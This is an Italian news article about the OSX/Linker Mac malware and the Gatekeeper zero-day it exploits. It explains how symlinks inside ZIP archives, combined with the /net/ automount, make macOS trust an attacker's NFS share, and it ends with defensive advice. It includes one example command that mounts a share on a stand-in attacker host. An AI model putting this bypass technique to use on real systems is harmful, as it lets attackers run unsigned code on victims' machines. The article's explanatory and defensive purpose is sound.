OSX/Linker è un nuovo malware per Mac che sfrutta una vulnerabilità di tipo zero-day presente nel sistema di sicurezza integrata Gatekeeper, consentendo ad un eventuale attaccante di eseguire codice arbitrario sul computer della vittima senza il suo consenso.
Gatekeeper, lo ricordiamo, è una funzionalità per la sicurezza integrata presente nelle versioni più recenti dei sistemi operativi macOS e il suo compito è quello di controllare e verificare la presenza di una firma digitale valida associata ai file aperti sul Mac prima di eseguirli, bloccando così l’eventuale caricamento di codice dannoso.
La vulnerabilità zero-day presente in Gatekeeper è stata resa pubblica dall’italiano Filippo Cavallarin lo sorso 24 maggio, ma al momento Apple non ha rilasciato ancora alcuna patch.
Vacilla, quindi, il mito di inattaccabilità dei sistemi Mac. Secondo Fabrizio Croce, Area Director South Europe di WatchGuard, “uno dei punti di forza che si pubblicizzava per ambienti Mac e Linux era la loro ipotetica inattaccabilità a qualsiasi tipo di malware e virus, ma ormai questa falsa credenza è stata smentita da sempre più minacce dedicate anche al mondo Apple. Solo nell’ultimo anno”, continua l’analista, “si sono verificate tre gravi minacce che sfruttano la tecnologia Gatekeeper di Mac nata proprio per aumentare la sicurezza del sistema operativo OS X”.
Indice degli argomenti
OSX/Linker: i dettagli del malware per Mac
Secondo il team di ricercatori di sicurezza di Intego i criminal hacker avrebbero ora iniziato a sfruttare la vulnerabilità di Gatekeeper scoperta da Cavallarin utilizzando un file immagine disco in formato .dmg, tipicamente usato per distribuire software su sistemi Mac.
I ricercatori hanno infatti individuato quattro campioni del malware camuffato da installer di Adobe Flash Player caricati su VirusTotal da un utente anonimo, il che lascerebbe pensare che il codice malevolo sia comunque ancora in fase di sviluppo.
Uno dei file, inoltre, sarebbe stato firmato digitalmente con un Apple Developer ID identico a quello usato per firmare il famigerato malware OSX/Surfbuyer: probabilmente, quindi, dietro i due malware c’è lo stesso gruppo di criminal hacker. Apple. Al momento, ha revocato il certificato digitale ma potrebbe non passare molto tempo prima che i criminal hacker riescano ad utilizzarne un altro.
La vulnerabilità sfruttata da OSX/Linker risiede nel modo in cui Gatekeeper tratta le applicazioni caricate da una risorsa di rete condivisa e da Internet. Gatekeeper, per impostazione predefinita, considera le unità esterne (USB e HDD) e le condivisioni di rete come “luoghi sicuri” e consente quindi di eseguire le applicazioni provenienti da queste fonti senza il consenso dell’utente.
OSX/Linker riesce quindi a bypassare ogni controllo di sicurezza grazie allo sfruttamento combinato della vulnerabilità presente in Gatekeeper e di altre due funzionalità legittime di macOS:
- la prima riguarda gli archivi ZIP e consente di inserire al loro interno collegamenti simbolici che puntano a posizioni arbitrarie, compresi gli endpoint aziendali o eventuali host remoti;
- la seconda riguarda invece la funzione di automount e consente di montare automaticamente una condivisione di rete da un server remoto semplicemente accedendovi con un percorso “speciale” che inizia con il parametro /net/.
Un eventuale attaccante, quindi, potrebbe usare un simile indirizzo di rete:
ls /net/net/evil-attacker.com/sharedfolder/
per forzare il sistema operativo a leggere il contenuto della cartella condivisa sharedfolder presente sul server remoto controllato dall’attaccante stesso (evil-attacker.com) utilizzando il protocollo di rete NFS (Network File System).
All’attaccante basta quindi creare un file ZIP contenente un oggetto che crea un link simbolico ad una condivisione di rete controllata dall’aggressore che macOS monterà in automatico.
Una volta che la vittima apre lo ZIP e segue il link, verrà reindirizzato verso la condivisione di rete controllata dall’aggressore di cui Gatekeeper si “fida” consentendo di eseguire un qualsiasi file senza richiedere alcuna interazione alla vittima e senza mostrare alcun avviso di sicurezza.
La scoperta dei campioni del malware OSX/Linker all’interno di file di immagini disco in formato .dmg sarebbe la dimostrazione che i criminal hacker stanno provando a capire se la vulnerabilità di Gatekeeper funziona anche con questo o con altri tipi di file.
Come difendersi dal malware per macOS
Come dicevamo, al momento Apple non ha rilasciato alcuna patch risolutiva per la vulnerabilità di Gatekeeper.
In attesa che ciò avvenga, il consiglio per gli amministratori di rete è quello di bloccare le comunicazioni verso indirizzi IP esterni che avvengono sul protocollo NFS.
È importante, inoltre, soprattutto in ambito produttivo e aziendale, non aprire mai allegati di e-mail provenienti da fonti sospette o sconosciute, così come non dovremmo mai eseguire file archiviati in unità di memoria USB o esterne di cui non abbiamo l’assoluta certezza di affidabilità.
Un altro piccolo trucco da mettere in pratica per provare a mitigare il pericolo di sfruttamento della vulnerabilità presente in Gatekeeper è il seguente:
- apriamo il file /etc/auto_master con privilegi di root usando un qualsiasi editor di testo;
- modifichiamo la prima riga del file che comincia con /net aggiungendo il simbolo # subito all’inizio;
- riavviamo il sistema per applicare le modifiche al file di configurazione.
L’efficacia di questo trucco non è garantita, ma almeno è possibile fare un tentativo in attesa di una soluzione ufficiale del problema da parte di Apple.
Fabrizio Croce di WatchGuard consiglia, inoltre, “di dotarsi anche in ambienti Mac di sistemi che rilevino e blocchino gli zero day non solo utilizzando la tecnica basata sulle firme virali, ma anche tecnologie più sofisticate come sanboxing e deep learning che completino un normale antivirus. Importante è anche la correlazione di eventi per identificare un eventuale codice maligno in esecuzione tramite il suo traffico di rete, accesso a risorse esterne e processi in esecuzione”.
